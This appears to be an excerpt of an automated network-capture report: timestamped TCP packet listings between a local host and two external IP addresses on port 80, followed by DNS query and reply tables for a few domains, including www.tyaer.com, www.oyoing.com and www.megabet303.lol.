                                                                            Apr 25, 2024 11:03:39.216478109 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216496944 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216511965 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216528893 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216545105 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216605902 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216619015 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216656923 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216701984 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216727972 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216743946 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216753960 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216775894 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216816902 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216835976 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216840982 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216851950 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216862917 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216881990 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216897964 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216913939 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216944933 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.216974974 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.216988087 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217005014 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217073917 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217098951 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217106104 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217127085 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217158079 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217185974 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217217922 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217267990 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217320919 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217364073 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217411995 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217550039 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217583895 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217602968 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217618942 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217638969 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217704058 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217745066 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217765093 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217782021 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217797041 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217813015 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.217829943 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217844963 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.217899084 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.423991919 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424011946 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424045086 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424072981 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424072981 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424124956 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424135923 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424175024 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424233913 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424251080 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424261093 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424267054 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424287081 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424328089 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424333096 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424391985 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424412012 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424468994 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424496889 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424535036 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424570084 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424638987 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424649954 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424665928 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424683094 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424698114 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424757957 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424757957 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424787998 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424861908 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424865007 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424899101 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424925089 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.424957991 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.424958944 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425015926 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425031900 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425040960 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425048113 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425112963 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425127029 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425142050 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425158024 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425173044 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425195932 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425201893 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425231934 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425283909 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425299883 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425307035 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425317049 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425342083 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425342083 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425362110 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425378084 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425385952 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425407887 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425421000 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425421000 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425442934 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425458908 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425510883 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425510883 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425539970 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425554991 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425595999 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425622940 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425654888 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425695896 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425724030 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425753117 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425784111 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425786018 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425836086 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425859928 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425863028 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425887108 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425893068 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425945997 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425945997 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.425951958 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425967932 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.425997972 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426033020 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426033020 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426049948 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426068068 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426076889 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426125050 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426151037 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426155090 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426182985 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426184893 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426218987 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426224947 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426250935 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426280975 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426347971 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426400900 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426418066 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426429987 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426434040 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426469088 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426469088 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426482916 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426501036 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426547050 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426568031 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426568031 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426587105 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426620960 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426662922 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426687956 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426704884 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426721096 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426737070 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426753998 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426764011 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426769972 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426788092 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426801920 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426815987 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426831007 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426863909 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426873922 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426889896 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426898956 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426928043 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426958084 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.426959038 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.426995993 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427016973 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427016973 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427066088 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427076101 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427084923 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427134037 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427134037 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427139044 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427156925 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427172899 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.427196980 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.427275896 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631614923 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631633997 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631649971 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631685972 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631746054 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631766081 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631767988 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631783962 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631803036 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631808996 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631831884 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631831884 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631851912 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631890059 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631897926 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631923914 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.631954908 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.631974936 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632009983 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632026911 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632044077 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632067919 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632076025 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632116079 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632153988 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632169962 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632186890 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632211924 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632226944 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632256985 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632313013 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632319927 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632355928 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632374048 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632390976 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632407904 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632431984 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632431984 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632456064 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632472038 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632482052 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632503033 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632530928 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632545948 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632575035 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632591009 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632616043 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632641077 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632641077 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632684946 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632700920 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632703066 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632721901 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632759094 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632776022 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632785082 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632822037 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632875919 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632896900 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632898092 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632926941 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632945061 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.632946014 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.632987976 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633039951 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633064985 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633094072 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633126974 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633152962 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633157969 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633207083 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633223057 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633239985 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633271933 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633325100 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633341074 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633351088 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633357048 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633403063 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633429050 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633457899 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633523941 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633541107 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633558035 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633591890 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633610964 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633616924 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633616924 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633626938 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633657932 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633688927 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633708954 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633724928 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633739948 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633770943 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633790016 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633790016 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633825064 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633850098 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:39.633850098 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633873940 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:39.633950949 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:44.427408934 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:44.427490950 CEST4971380192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:04:14.429280043 CEST804971387.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:04:26.365633011 CEST4971780192.168.2.547.91.88.207
                                                                            Apr 25, 2024 11:04:26.578089952 CEST804971747.91.88.207192.168.2.5
                                                                            Apr 25, 2024 11:04:26.578175068 CEST4971780192.168.2.547.91.88.207
                                                                            Apr 25, 2024 11:04:26.578949928 CEST4971780192.168.2.547.91.88.207
                                                                            Apr 25, 2024 11:04:26.791315079 CEST804971747.91.88.207192.168.2.5
                                                                            Apr 25, 2024 11:04:26.813661098 CEST804971747.91.88.207192.168.2.5
                                                                            Apr 25, 2024 11:04:26.813680887 CEST804971747.91.88.207192.168.2.5
                                                                            Apr 25, 2024 11:04:26.813818932 CEST4971780192.168.2.547.91.88.207
                                                                            Apr 25, 2024 11:04:26.814505100 CEST4971780192.168.2.547.91.88.207
                                                                            Apr 25, 2024 11:04:27.026854992 CEST804971747.91.88.207192.168.2.5
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 25, 2024 11:04:26.237379074 CEST5711753192.168.2.51.1.1.1
                                                                            Apr 25, 2024 11:04:26.361032009 CEST53571171.1.1.1192.168.2.5
                                                                            Apr 25, 2024 11:04:41.855376005 CEST6430253192.168.2.51.1.1.1
                                                                            Apr 25, 2024 11:04:41.991966963 CEST53643021.1.1.1192.168.2.5
                                                                            Apr 25, 2024 11:04:54.133102894 CEST5355053192.168.2.51.1.1.1
                                                                            Apr 25, 2024 11:04:54.270534039 CEST53535501.1.1.1192.168.2.5
                                                                            Apr 25, 2024 11:05:01.151916981 CEST5441853192.168.2.51.1.1.1
                                                                            Apr 25, 2024 11:05:01.284907103 CEST53544181.1.1.1192.168.2.5
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Apr 25, 2024 11:04:26.237379074 CEST192.168.2.51.1.1.10x48d5Standard query (0)www.tyaer.comA (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:04:41.855376005 CEST192.168.2.51.1.1.10x588fStandard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:04:54.133102894 CEST192.168.2.51.1.1.10x71c8Standard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:05:01.151916981 CEST192.168.2.51.1.1.10x4ee0Standard query (0)www.megabet303.lolA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Apr 25, 2024 11:02:54.685543060 CEST1.1.1.1192.168.2.50x514dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:02:54.685543060 CEST1.1.1.1192.168.2.50x514dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:03:25.461520910 CEST1.1.1.1192.168.2.50xad19No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:03:25.461520910 CEST1.1.1.1192.168.2.50xad19No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
